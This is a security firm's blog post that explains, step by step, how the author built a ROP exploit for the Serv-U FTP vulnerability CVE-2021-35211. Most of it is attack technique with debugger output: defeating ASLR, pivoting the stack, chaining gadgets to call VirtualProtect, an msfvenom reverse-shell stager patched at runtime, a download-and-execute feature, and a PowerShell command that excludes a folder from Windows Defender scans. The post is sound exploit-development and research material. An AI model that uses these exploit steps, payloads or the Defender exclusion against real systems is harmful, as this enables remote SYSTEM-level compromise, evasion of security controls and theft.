Bishop Fox named “Leader” in 2024 GigaOm Radar for Attack Surface Management. Read the Report ›

Creating an Exploit: SolarWinds Vulnerability CVE-2021-35211

Illustration of fox sitting at desk on computer



As part of our work on the Cosmos platform (formerly known as CAST) we sometimes have a requirement to weaponize vulnerabilities in order to achieve specific customer requirements. In this case we were asked "can you guys write an exploit for this?" and we were happy to oblige.

The Vulnerability

In this blog, I'd like to share some of the thought process behind creating a ROP-based exploit for Serv-U FTP v15.2.3.717 on modern Windows systems. I'm not going to cover the root cause of the vulnerability here because the Microsoft research team did a good job of it in their blog post. Please read that article first and then come back here if you're interested in how we arrived at the point of NattySamson's PoC and our subsequent exploit.

We pick up at the point where Natty's PoC gives us a semi-reliable way to populate the r9 register with an attacker-supplied value that is subsequently used by a call r9 instruction. This gives us a way to control rip and theoretically execute arbitrary code in the context of Serv-U, which typically runs as a service as NT AUTHORITY\System.

We'll keep the tooling simple. If you want to play along you'll need:

  • A disassembler. In this example I used Hopper Disassembler, but IDA Pro, Ghidra, or anything else will do.
  • Radare2. The Swiss army knife of assembly language! Get it from the Radare2 website.
  • WinDBG. I used WinDBG on Windows Server 2022 Datacenter, you can get it here.
  • Proof-of-Concept code. The exploit I wrote is based on the PoC written by NattiSamson. The original code is here: PoC.
  • Serv-U-FTP v15.2.3.717. Download it from the Serv-U Download page.
  • Python 3. Python 2 will probably work with some tweaks.
Note that I am not using Mona or other such tools to automate the exploit development process. I'm doing a lot of this manually to better demonstrate the steps involved in writing ROP exploits; perhaps in a later blog post I'll go over how to do this with automation tooling like Mona.

    If you don't care about the technical details and just want to grab the exploit, it's available here.

    Summarizing the Exploit Development

    I started with NattiSamson's PoC that triggered the bug in Serv-U and placed a user-controllable value into rip via a call r9 instruction. r9 is a QWORD (8-byte / 64-bit) register, the contents of which can be controlled by passing a carefully constructed malicious payload during the initial SSH cryptographic handshake with Serv-U.

    Let's break the exploit development down into chunks. This will be a ROP exploit and loosely gets constructed like so:

    1. Figure out what address to put into r9 in order to kickstart code execution
    2. Defeat ASLR to enable the above
    3. Pivot the stack pointer rsp to point at the ROP chain in our payload
    4. Find the address of the function kernel32.dll!VirtualProtect, which I'll use to make the stack executable (RWX)
    5. Identify useful ROP gadgets to do (4)
    6. Build a ROP chain that calls VirtualProtect to change the stack's page protection from R-X to RWX
    7. Reset the stack/registers to pre-exploit values (if necessary and feasible)
    8. Add ROP gadgets to jump to shellcode on the newly executable stack

    I may or may not stick to that order!

    Where to Jump? ASLR? Stack Pivot?

    The first three above points are all intertwined, so I'll deal with them at the same time. The question is: What memory address should I put into r9 in order to kickstart our ROP chain exploit? I must solve for:

    • The stack pointer rsp must point to our ROP chain before the call r9 returns with a ret instruction. This is because of the way ret works. Think of the ret instruction as an equivalent of pop rax ; jmp rax or more simply, pop rip, both of which pop a 64-bit address off the stack and jump to it. If you control the stack, you control the return address of every ret instruction in the future.
    • In other words: if rsp doesn't point to our ROP chain by the time ret is called, I'm hosed.
    • Unfortunately, rsp does not point to our ROP chain at the time of the PoC's call r9, so our first ROP gadget must populate rsp with the address of our payload/ROP chain buffer and then call ret.
    • Due to ASLR, most memory addresses will be different every time Serv-U is launched. I must find a static addresses, at least until I get a proper foothold to query the runtime dynamically.

    Whew. Tricksy. Fortunately, the stars aligned on this bug and it's pretty easy to work around these problems. First up: ASLR. I can't do anything until I've worked around address space randomization.


    I can't stack pivot or reliably jump to a useful instruction or pivot to a ROP chain until I've found useful non-ASLR predictable, repeatable addresses.

    The first thing to do is see if Serv-U.exe or any of the bundled DLLs are compiled without ASLR support. The tool for the job is NetSPI's PESecurity, available from It's a PowerShell script that scans executable files for security flags and produces a concise report, like so:

    PS C:\Users\Administrator\Desktop> Import-Module .\Get-PESecurity.psm1
    PS C:\Users\Administrator\Desktop> Get-PESecurity -directory 'C:\Program Files\RhinoSoft\Serv-U' -recursive
    FileName         : C:\Program Files\RhinoSoft\Serv-U\RhinoNET.dll
    ARCH             : AMD64
    DotNET           : False
    ASLR             : False
    DEP              : True
    Authenticode     : False
    StrongNaming     : N/A
    SafeSEH          : N/A
    ControlFlowGuard : False
    HighentropyVA    : True
    FileName         : C:\Program Files\RhinoSoft\Serv-U\RhinoRES.dll
    ARCH             : AMD64
    DotNET           : False
    ASLR             : False
    DEP              : True
    Authenticode     : False
    StrongNaming     : N/A
    SafeSEH          : N/A
    ControlFlowGuard : False
    HighentropyVA    : True
    FileName         : C:\Program Files\RhinoSoft\Serv-U\Serv-U-RES.dll
    ARCH             : AMD64
    DotNET           : False
    ASLR             : False
    DEP              : True
    Authenticode     : False
    StrongNaming     : N/A
    SafeSEH          : N/A
    ControlFlowGuard : False
    HighentropyVA    : True
    FileName         : C:\Program Files\RhinoSoft\Serv-U\Serv-U-Setup.exe
    ARCH             : AMD64
    DotNET           : False
    ASLR             : False
    DEP              : True
    Authenticode     : True
    StrongNaming     : N/A
    SafeSEH          : N/A
    ControlFlowGuard : False
    HighentropyVA    : True
    FileName         : C:\Program Files\RhinoSoft\Serv-U\Serv-U-Tray.exe
    ARCH             : AMD64
    DotNET           : False
    ASLR             : False
    DEP              : True
    Authenticode     : True
    StrongNaming     : N/A
    SafeSEH          : N/A
    ControlFlowGuard : False
    HighentropyVA    : True
    FileName         : C:\Program Files\RhinoSoft\Serv-U\Serv-U.dll
    ARCH             : AMD64
    DotNET           : False
    ASLR             : False
    DEP              : True
    Authenticode     : False
    StrongNaming     : N/A
    SafeSEH          : N/A
    ControlFlowGuard : False
    HighentropyVA    : True
    FileName         : C:\Program Files\RhinoSoft\Serv-U\zlib1.dll
    ARCH             : AMD64
    DotNET           : False
    ASLR             : False
    DEP              : True
    Authenticode     : False
    StrongNaming     : N/A
    SafeSEH          : N/A
    ControlFlowGuard : False
    HighentropyVA    : True

    Holy smokes, that's a lot of non-ASLR binaries! For shame, SolarWinds. This means that Serv-U.dll, etc. will always be loaded into the same memory addresses, which means that I have reliable addresses from which to harvest ROP gadgets.

    Stack Pivot

    As mentioned before, the stack pointer rsp doesn't point to our exploit payload buffer at the time call r9 happens. This breaks everything because once the r9 function calls ret the CPU will pop the return address off the stack at the address in rsp and jmp to it. In other words, execution resumes as normal. I can control r9 and therefore control where the call jumps to, but I can't control where it returns to; I have to find a way to point rsp at our payload and return to our ROP chain using only a single ROP gadget.

    It turns out that our payload is actually stored at the address stored in rbp. How do I know that? By examining the registers and the stack in a debugger at the point call r9 is executed by the CPU.

    First the registers:

    <0:008> r
    00 0000000d`09bfebf0 00000000`72111cb8     LIBEAY32!CRYPTO_ctr128_encrypt+0xc6
    rax=0000000000000010 rbx=000001ed4d497f00 rcx=000001ed4d9126b8
    rdx=000001ed4d9126c8 rsi=ffffffffffb627a8 rdi=0000000000000000
    rip=00000000720b9636 rsp=0000000d09bfebf0 rbp=000001ed4d5a410a
     r8=000001ed4d497f00  r9=4141414141414100 r10=000001ed4d497f00
    r11=000001ed4d5a40fa r12=000001ed4d9126c8 r13=0000000000000001
    r14=ffffffffffc91a32 r15=000001ed4d474e80
    iopl=0         nv up ei pl nz na po nc
    cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
    00000000`720b9636 41ffd1          call    r9 {41414141`41414141}

    We can see that the stack pointer and base pointers are nowhere near each other:

    rsp = 0x00d09bfebf0
    rbp = 0x1ed4d5a410a

    There was nothing of our payload at rsp's memory address, but what about rbp?

    0:013> db @rbp l128
    00000253`5badfa9a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000253`5badfaaa  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000253`5badfaba  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000253`5badfaca  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000253`5badfada  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000253`5badfaea  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000253`5badfafa  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000253`5badfb0a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000253`5badfb1a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000253`5badfb2a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000253`5badfb3a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000253`5badfb4a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000253`5badfb5a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000253`5badfb6a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000253`5badfb7a  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
    00000253`5badfb8a  41 41 41 41 41 41 41 41-00 00 00 00 00 00 00 00  AAAAAAAA........
    00000253`5badfb9a  00 00 00 00 00 00 00 00-00 00 00 00 00 00 73 92  ..............s.
    00000253`5badfbaa  bf a1 35 03 00 90 b8 34-5a 90 ff 7f 00 00 70 34  ..5....4Z.....p4
    00000253`5badfbba  5a 90 ff 7f 00 00 00 22                          Z......"

    Bingo! So first order of the day is to move the address in rbp to rsp. To do that I need a ROP gadget that does something like:

    mov rsp, rbp

    It's rarely that easy, but that's where we start. Using Radare2 to search for ROP gadgets is simple, particularly on architectures that allow unaligned memory accesses like Intel x64 that help us to find gadgets that aren't even part of the compiled code. It's a cool concept, check it out. Consider the following code:

    0x18005d485               498be3  mov rsp, r11
    0x18005d488                   5d  pop rbp
    0x18005d489                   c3  ret

    The first instruction, mov rsp, r11, takes up three bytes \x49\x8b\xe3 and starts at address 0x18005d485. Therefore, the next instruction is at an address 3 bytes higher at 0x18005d488.

    But what if I set the instruction pointer to address 0x18005d486, which is between the two "valid" instruction addresses? The opcodes would be \x8b\xe3\x5d\xc3, which is a completely different set of instructions. You can use Radare2 to disassemble these opcodes like so:

    % rasm2 -a x86 -b 64 -d 8be35dc3
    mov esp, ebx
    pop rbp

    Well, look at that! A completely different gadget. You can ask Radare2 to perform gadget searches byte by byte to uncover all possible permutations of instructions by using the "/ad/a " command like this:

    % r2 Serv-U.dll
     -- Ask not what r2 can do for you - ask what you can do for r2
    [0x1801a4184]> "/ad/a mov rsp;ret;"

    The above command "/ad/a mov rsp;ret" tells Radare2 to scan the Serv-U.dll file for instructions that match a mov followed by a ret, and in which the mov instruction is writing something to the rsp register. Each of the stacked query terms are separated by semicolons and are expected to be regexes; the entire command must be inside double-quotes.

    Sadly for us, the above Radare2 search returned no results. Ok, let's try to find a gadget that has some kind of mov rsp, .*, then any other instruction, and then a ret:

    [0x1801a4184]> "/ad/a mov rsp;.*;ret;"
    0x180059ffb               498be3  mov rsp, r11
    0x180059ffe                   5d  pop rbp
    0x180059fff                   c3  ret
    0x18005d485               498be3  mov rsp, r11
    0x18005d488                   5d  pop rbp
    0x18005d489                   c3  ret
    0x18005d986               498be3  mov rsp, r11
    0x18005d989                   5d  pop rbp
    0x18005d98a                   c3  ret
    0x18005fa9a               498be3  mov rsp, r11
    0x18005fa9d                 415e  pop r14
    0x18005fa9f                   c3  ret
    0x180063a5a               498be3  mov rsp, r11
    0x180063a5d                   5f  pop rdi
    0x180063a5e                   c3  ret
    0x180064795               498be3  mov rsp, r11
    0x180064798                   5f  pop rdi
    0x180064799                   c3  ret
    ...omitted for brevity...
    0x180196569               498be3  mov rsp, r11
    0x18019656c                   5f  pop rdi
    0x18019656d                   c3  ret
    0x1801a167f               498be3  mov rsp, r11
    0x1801a1682                   5f  pop rdi
    0x1801a1683                   c3  ret

    That's a LOT of matching gadgets! Remember, I want to put the address of our payload into rsp. Let's rule out any gadgets where rbp is popped off the stack; I’d like to avoid messing with more stack registers than absolutely necessary. I don't care if rdi gets messed up, so those gadgets could be useful so long as r11 points to the location of our payload buffer on the stack.

    To check r11's value I used WinDBG to attach to the Serv-U process and compare the value of rbp against r11 at the time call r9 is executed by the exploit:

    (1c60.1c04): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    00000000`720b9636 41ffd1          call    r9 {41414141`41414141}
    0:013> r
    rax=0000000000000010 rbx=0000020058925d20 rcx=0000020058d1d688
    rdx=0000020058d1d698 rsi=ffffffffffb5ee68 rdi=0000000000000000
    rip=00000000720b9636 rsp=0000009dd2aff320 rbp=0000020058648b3a
     r8=0000020058925d20  r9=4141414141414141 r10=0000020058925d20
    r11=0000020058648b2a r12=0000020058d1d698 r13=0000000000000001
    r14=ffffffffff92b492 r15=000002005887c510
    iopl=0         nv up ei pl nz na po nc
    cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
    00000000`720b9636 41ffd1          call    r9 {41414141`41414141}

    We can see that:


    What good fortune! The r11 register points at an address 16 bytes up from rbp, which points exactly at our payload buffer. I can use the newly identified ROP gadget to perform the stack pivot, pop eight bytes off the "stack" (which is really our payload) into rdi, and then pop the next bytes off the stack into rip; given that I control the new stack, I therefore control the value of rip, which means I now have a means to pivot the stack and continue execution from our ROP chain.

    I chose the gadget address of 0x18010391a from those found by Radare2. It became the value placed into the payload buffer as our first ROP gadget address.

    Executing Shellcode: Find kernel32!VirtualProtect

    Now that I've pivoted the stack to our ROP buffer, I need to set up the conditions for executing shellcode. Step one: Make the memory pages in which our shellcode is stored readable, writable, and - most importantly - executable. Our shellcode is on the stack in our payload buffer, so that's what I need to make executable.

    The function VirtualProtect is used to change the protection flags for regions of memory, which lets us set the stack to executable (RWX). I checked the import table of Serv-U.dll, but it didn't import VirtualProtect, so the easiest way of getting the correct address (direct reference) wouldn't work. Instead I have to use native Windows functions to derive the address by calling the equivalent of GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "VirtualProtect").

    We can see from the disassembler's import tables (Navigation / Imported Symbols in Hopper) that Serv-U.dll imports GetModuleHandleW from kernel32.dll:

    View of the disassembler's import tables

    It also imports GetProcAddress:

    View of the disassembler's import table with GetProcAddress

    The address 0x1801c92c8 is a trampoline stub built into Serv-U.dll that, when jumped to, redirects execution to the real kernel32!GetModuleHandleW that's been mapped into Serv-U's process space by the operating system's library loader. The same applies for 0x1801c9590 and kernel32!GetProcAddress. In other words, the value stored at address 0x0x1801c92c8 is a pointer to the real GetModuleHandleW function.

    Let's dereference it in the debugger and double-check that it matches the real address of GetModuleHandleW in this context. First, dereference the trampoline in Serv-U.dll:

    0:026> u poi(0x1801c92c8)
    00007ffd`19e4ce40 48ff2559370600  jmp     qword ptr [KERNEL32!_imp_GetModuleHandleW (00007ffd`19eb05a0)]
    00007ffd`19e4ce47 cc              int     3

    Awesome. Does the same apply to GetProcAddress?

    0:026> u poi(0x1801c9590)
    00007ffd`19e4a780 4c8b0424        mov     r8,qword ptr [rsp]
    00007ffd`19e4a784 48ff25bd510600  jmp     qword ptr [KERNEL32!_imp_GetProcAddressForCaller (00007ffd`19eaf948)]
    00007ffd`19e4a78b cc              int     3

    Yes indeed! That has saved us a lot of hassle and I can write the ROP chain the "easy" way by calling known pointers to access the functions needed to locate VirtualProtect. In order to call the necessary functions I'll need to find some ROP gadgets the provide the necessary functionality.

    Identify ROP gadgets

    I started by sketching out a rough plan of what I wanted to achieve.

    • Stack pivot
    • Set up the parameter needed when calling moduleHandle = GetModuleHandleW(L"kernel32.dll")
    • Call it
    • Set up the two parameters needed when calling VirtualProtect = GetProcAddress(moduleHandle, "GetProcAddress")
    • Call it
    • Set up the four parameters required for VirtualProtect(stackAddress, size, attributes, &results)
    • Call it
    • Load the address of our payload buffer's NOP sled + shellcode
    • Restore the pre-exploit stack frame
    • Jump to the shellcode

    It takes a bit of trial and error to build up the gadget chain because we're often limited to less-than-perfect gadgets. So I spent some time finding useful gadgetry. What constitutes "useful?” Here's a few ideas:

    • Simple and short. E.g. mov rax, rbx ; ret is much better than mov rax, rbx; mov rax, qword ptr [rax+10h]; pop rcx; ret because the latter stomps on the values we want and it also messes with the stack due to the pop instruction. Simple is good in ROP. But if we can't find "perfect" gadgets (i.e. those that perform only the desired operation and a ret) then we have to settle for gadgets with extra baggage.
    • Manipulation of argument-passing registers on x64. Gadgets that allow us to pop values off the stack into the four argument-passing registers (rcx, rdx, r8, and r9, respectively) are super useful for calling into functions. So for example these gadgets are solid gold:
      • pop rcx ; ret
      • pop rdx ; ret
      • pop r8 ; ret
      • pop r9 ; ret
    • In this exploit there was no pop r9 gadget available. Instead, I looked for the smallest possible non-perfect gadgets to load another register with the desired value and swap it into the r9 register, like so:
      • pop rax ; xchg r9, rax ; ret
    • Flow control gadgets like jmp rax ; ret or call rbx ; ret can be chained together like so:
      • pop rax followed by
      • jmp rax or jmp qword ptr [rax]
    • Gadgets that dereference the registers are super useful when bouncing off trampolines like the ones I have for GetModuleHandleW and GetProcAddress. For example:
      • mov rax, qword ptr [rax]. Reads the value at the memory address in rax and stores it in the rax register.
      • For example, if rax=0x123456789 then the above instruction reads the 8 bytes at memory address 0x123456789 and stores that value in the rax register.

    I spent some time collecting gadgets and then used them to construct a real ROP chain. Sometimes it doesn't work out and you need to spend forever thinking up alternative ways of doing the job. For example, I spent hours trying to find an easy way to put arbitrary values in the r9 register when calling into VirtualProtect. Eventually I settled on a two-gadget chain that populated r9 via rax, like so:

    # Gadget 1
    pop rax         # we control the stack, so we can control the value popped into rax
    # Gadget 2
    xchg rax, r9    # tadaaaa</p>
    adc al, 0       # Effectively a NOP without consequences
    add rsp, 0x38   # Effectively a NOP with consequences: stack pointer increases by 0x38 bytes.
    ret             # The address popped off the stack by the ret instruction needs to be 0x38 bytes further up our payload/stack than it normally would be.

    The double-gadget was a compromise because I really didn't want to have 0x38 bytes of my payload eaten up by add rsp, 0x38, but it did the job and was the best I had, so I went with it.

    Call GetModuleHandleW

    The GetModuleHandleW function is defined as:

    HMODULE GetModuleHandleW(
      [in, optional] LPCWSTR lpModuleName

    It returns a pointer (aka "handle" in Microsoft terminology) to specify the module (DLL, executable, etc) in memory. The pointer literally points to a complete DLL in memory if it's loaded. The name of the module must be specified as a "wide" string, which uses 16 bits per character instead of ASCII's eight bits per character. For example:


    "kernel32" = \x6b\x65\x72\x6e\x65\x6c\x33\x32

    Wide String:

    "kernel32" = \x6b\x00\x65\x00\x72\x00\x6e\x00\x65\x00\x6c\x00\x33\x00\x32\x00"

    Handily enough, there is a wide string version of kernel32 in the Serv-U.dll binary! It's located at 0x180313230, as shown here in Hopper:

    wide string version of kernel32 in the Serv-U.dll binary shown here in Hopper.

    Note that it's denoted as type dw, which is a wide string. Checking the result in the hex editor confirms that this is really a wide string:

    Result in the hex editor showing as a really wide string

    Excellent. All it takes to call GetModuleHandleW(L"kernel32.dll") is the following pseudo-code:

    pop rcx         # We place the value 0x180313230 (address of kernel32 string) on the stack to be popped into rcx
    pop rax         # We place the value 0x1801c92c8 (address of GetModuleHandleW trampoline) on the stack to be popped into rax
    jmp [rax]       # Dereference rax and jump to the resulting address, which is the real address of GetModuleHandleW
    mov rcx, rax    # Save the returned handle in rcx for later

    The handle for kernel32.dll is returned in the rax register, which we can save for later use. In the exploit I save it into a writable area of memory in Serv-U's .data segment that I treat as a scratchpad for "variables" that hold data temporarily.

    Call GetProcAddress

    The GetProcAddress function is defined as:

    FARPROC GetProcAddress(
      [in] HMODULE hModule,
      [in] LPCSTR  lpProcName

    The first parameter is the handle I obtained from GetModuleHandleW. The second is the name of the function I want to find: VirtualProtect. This time the string is expected to be ASCII, not wide. Unfortunately, there is no NULL-terminated "VirtualProtect" string in the Serv-U binaries, so I need to create my own using the stack.

    The first step is to find a writable memory address in Serv-U's .data segment to which I can write a string. I used Hopper to look through the data segment for a section that was not cross-referenced to any code; the assumption is that the memory area is truly unused. Pseudo-code is as follows:

    # Write "VirtualProtect\x00\x00" (16 bytes) to an unused address in .data
    # Split the task so that two 8-byte chunks are written consecutively.
    pop rdx         # An unused address in Serv-U's data segment gets popped into rdx. 
    pop rax         # Pop the value 0x506c617574726956 ("VirtualP" little-endian) off the stack.
    mov [rdx], rax  # Write "VirtualP" to the first 8 bytes of our .data memory chunk.
    pop rdx         # Pop the address of the next 8 bytes of .data memory into rdx. 
    pop rax         # Pop "rotect\x00\x00" off the stack into the rax register.
    mov [rdx], rax  # Append "rotect\x00\x00" to our memory chunk, making a complete "VirtualProtect\x00\x00" string.

    Now I can call GetProcAddress:

    # Assume rcx contains the value returned by GetModuleHandleW, the handle to kernel32.dll
    # Assume rdx contains the address of the string "VirtualProtect\x00"
    pop rax         # Pop 0x1801c9590 off the stack (the address of the GetProcAddress trampoline)
    jmp [rax]       # Jump to GetProcAddress(handle, "VirtualProtect\x00")
    # The address of the VirtualProtect function is returned in rax)

    Phew! I now have the address of VirtualProtect in rax.

    Calling VirtualProtect

    The VirtualProtect function is defined as:

    BOOL VirtualProtect(
      [in]  LPVOID lpAddress,       # Starting address of memory to make executable (rounded down to nearest 4k page boundary).
      [in]  SIZE_T dwSize,          # Number of bytes to make executable (rounded up to nearest 4k page boundary).
      [in]  DWORD  flNewProtect,    # Protection flags. In this case 0x40 = RWX.
      [out] PDWORD lpflOldProtect   # Return results in this variable. Must be a writable memory address!

    Remember that the parameters are passed to this function in the rcx, rdx, r8, and r9 registers, respectively. In this case:

    rcx = Address of our payload buffer (i.e. the current stack address)
    rdx = 0x2000 (8kB or two 4k memory pages)
    r8  = 0x40 (readable, writable, executable)
    r9  = Address from .data segment of Serv-U

    The second and third parameters are dead easy: Just pop them off the stack!

    pop rdx         # Pop 0x2000 off the stack
    pop r8          # Pop 0x40 off the stack

    Getting the last argument is slightly trickier because we have no pop r9 gadget to work with; instead the compound gadget is used:

    # 1st gadget
    pop rax         # Pop writable address off the stack into rax
    # 2nd gadget
    xchg rax, r9    # Swap rax and r9 so that r9 now contains the writable address
    adc al, 0       # Extra crap instruction does effectively no operation
    add rsp, 0x38   # This part of the gadget moves the stack pointer up 0x38 bytes. 
                    # We account for this in our exploit by skipping 0x38 bytes of our 
                    # payload buffer before writing the next value to the buffer.
    ret             # Return to the next gadget

    Finally I populate the first parameter: the address of our stack. The gadgets aren't perfect for this operation, but they work:

    # 1st gadget
    push rbp                # Push an address near our stack onto the head of the stack.
    pop rax                 # Pop the address off the stack into rax so that rax now contains the address of the stack.
    add byte ptr [rax], al  # Effective no operation in this context
    ret                     # Return to next gadget
    # 2nd gadget
    mov rcx, rax            # Put the (approximate) address of the stack into rcx

    At this point I have populated the registers and I just need to call VirtualProtect to make our shellcode executable:

    # Assuming we have address of VirtualProtect's trampoline in rax
    jmp [rax]

    And that's it! The part of the stack on which our shellcode resides is now executable.


    I took standard shellcode generated by msfvenom and patched it at exploit runtime to do my bidding. For example, consider the Metasploit-compatible shellcode stager. It's generated like so:

    [2021-10-19T18:47:49Z] root@h:/ehome/haggis# msfvenom  -p 
    windows/x64/meterpreter/reverse_tcp LHOST= LPORT=443 -f c
    [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    [-] No arch selected, selecting arch: x64 from the payload
    No encoder specified, outputting raw payload
    Payload size: 510 bytes
    Final size of c file: 2166 bytes
    unsigned char buf[] =

    The IP address to which the shellcode connects to download the second-stage shellcode is at these offsets:

    "PP"   # connect-back port       @ offs 244
    "HHHH" # connect-back IP address @ offs 246 

    My exploit simply patches in the IP:port specified on the command line at runtime. This makes it easy for the user/attacker to use arbitrary shellcode stagers / Sliver instances / Metasploit instances at runtime without having to generate new shellcode every time.

    I used the same trick for the command exec shellcode, which simply tacks on the user-specified commands to the end of the shellcode:

    shellcode = (
    rop[offs_NOP_sled+offs_NOP_sled_padding+267:] = shellcode + cmd.encode() + b"\x00"

    Again, this saves the user generating new shellcode every time. Finally, I implemented a download + exec feature, which accepts a user-specified URL, downloads an executable from the URL to C:\Windows\Temp, then runs it. One little wrinkle I added is a PowerShell command to disable Windows Defender virus/malware scans from running in C:\Windows\Temp so you can run completely unobfuscated Sliver/Meterpreter payloads without getting tripped up by Microsoft endpoint security.

    The PowerShell command to do this is:

    powershell -Command "& {Add-MpPreference -ExclusionPath c:\windows\temp}"

    Without that command you'll find Windows Defender alerts on almost any payload you care to drop. Note: I don't recommend this for red team engagements because you'll still get caught by a zillion other controls. But for simple use cases, it's more than sufficient to pop a connect-back shell or Sliver session.

    I Almost Forgot About Unpivoting the Stack

    Sometimes it's necessary to return the stack pointer to whence it came so that the exploited process can resume execution and handle any errors/exceptions tidily. This exploit crashes Serv-U, but it automatically restarts. This is unacceptable in a lot of scenarios and making it not crash is left as an exercise for the reader.

    However, returning the stack to normal is an interesting problem because in ROP we don't usually save the stack pointer before pivoting to a different stack - the malicious ROP one. Getting it back generally involves querying the Thread Environment Block ("TEB") and Process Environment Block ("PEB") via the gs: segment register on 64-bit Intel/AMD Windows. These blocks are maintained by the operating system and provide thread-local storage for metadata about running threads.

    The TEB starts at gs:[0] with a pointer to the PEB at gs:[0x30]. The PEB contains the stack starting address at offset 0x10. The following code can be used to read it:

    # recover the original stack
    mov rax, 0x30
    mov rax, qword gs:[rax]     # Read address of PEB out of TEB
    add rax, 0x10               # Offset in PEB to pre-exploit stack frame address
    mov rax, qword ptr [rax]    # Dereference [rax] to read the stack frame address out of the PEB
    mov rdi, rax                # Store address of old stack frame in rdi

    In order to return rsp to the same address it contained at the very beginning of the exploit - at the point when call r9 first occurred - I need to find the precise address of the top of the old stack frame. This turns out to be easy because the stack frame contains return addresses in Serv-U.dll, which as we saw earlier does not support ASLR.

    As a result I can simply look at a stack trace taken at the point call r9 is called and make note of the addresses there. For example, consider this stack trace taken from exactly the scenario just described:

    >0:013> k
     # Child-SP          RetAddr               Call Site
    00 0000009d`d2aff320 00000000`72111cb8     LIBEAY32!CRYPTO_ctr128_encrypt+0xc6
    01 0000009d`d2aff380 00000000`7218f41b     LIBEAY32!EVP_rc4_40+0x488
    02 0000009d`d2aff3d0 00000000`7210efaa     LIBEAY32!FINGERPRINT_premain+0x291b
    03 0000009d`d2aff410 00000001`8016086c     LIBEAY32!EVP_EncryptUpdate+0xda
    04 0000009d`d2aff460 00000001`80141795     Serv_U!CUPnPNotifyEvent::SetTimeout+0x22b7c
    05 0000009d`d2aff4a0 00000001`80141263     Serv_U!CUPnPNotifyEvent::SetTimeout+0x3aa5
    06 0000009d`d2aff4e0 00000001`80144fb0     Serv_U!CUPnPNotifyEvent::SetTimeout+0x3573
    07 0000009d`d2aff580 00000200`577f8dd7     Serv_U!CUPnPNotifyEvent::SetTimeout+0x72c0
    08 0000009d`d2aff650 00000200`577f8c5c     RhinoNET!CRhinoSocket::ProcessReceiveBuffer+0x33
    09 0000009d`d2aff690 00000200`577f6c4e     RhinoNET!CRhinoSocket::OnReceive+0x170
    0a 0000009d`d2aff6e0 00000200`577f32eb     RhinoNET!CRhinoProductSocket::OnReceive+0x3e
    0b 0000009d`d2aff710 00000200`577f356b     RhinoNET!CAsyncSocketX::DoCallBack+0x107
    0c 0000009d`d2aff740 00000200`577f350f     RhinoNET!CAsyncSocketX::ProcessAuxQueue+0x53
    0d 0000009d`d2aff770 00007fff`5ffda399     RhinoNET!CSocketWndX::OnSocketNotify+0x13
    0e 0000009d`d2aff7a0 00007fff`5ffd97af     mfc140u!CWnd::OnWndMsg+0xba9 [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\wincore.cpp @ 2698] 
    0f 0000009d`d2aff920 00007fff`5ffd7093     mfc140u!CWnd::WindowProc+0x3f [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\wincore.cpp @ 2099] 
    10 0000009d`d2aff960 00007fff`5ffd7464     mfc140u!AfxCallWndProc+0x123 [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\wincore.cpp @ 265]
    11 0000009d`d2affa50 00007fff`5fe7a509     mfc140u!AfxWndProc+0x54 [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\wincore.cpp @ 417]
    12 0000009d`d2affa90 00007fff`90c60089     mfc140u!AfxWndProcBase+0x49 [D:\a01\_work\6\s\src\vctools\VC7Libs\Ship\ATLMFC\Src\MFC\afxstate.cpp @ 299]
    13 0000009d`d2affad0 00007fff`90c5fa02     USER32!UserCallWinProcCheckWow+0x319
    14 0000009d`d2affc60 00000001`8016ea75     USER32!DispatchMessageWorker+0x1d2
    15 0000009d`d2affce0 00000001`8016eaed     Serv_U!CUPnPNotifyEvent::SetTimeout+0x30d85
    16 0000009d`d2affd50 00007fff`8ee36b4c     Serv_U!CUPnPNotifyEvent::SetTimeout+0x30dfd
    17 0000009d`d2affd80 00007fff`90954ed0     ucrtbase!thread_start<unsigned int (__cdecl*)(void *),1>+0x4c
    18 0000009d`d2affdb0 00007fff`9124e20b     KERNEL32!BaseThreadInitThunk+0x10
    19 0000009d`d2affde0 00000000`00000000     ntdll!RtlUserThreadStart+0x2b

    The first Serv-U stack frame is at index #4 and contains the saved return address for the instruction at:

    Serv_U!CUPnPNotifyEvent::SetTimeout + 0x22b7c:
    04 0000009d`d2aff460 00000001`80141795     Serv_U!CUPnPNotifyEvent::SetTimeout+0x22b7c

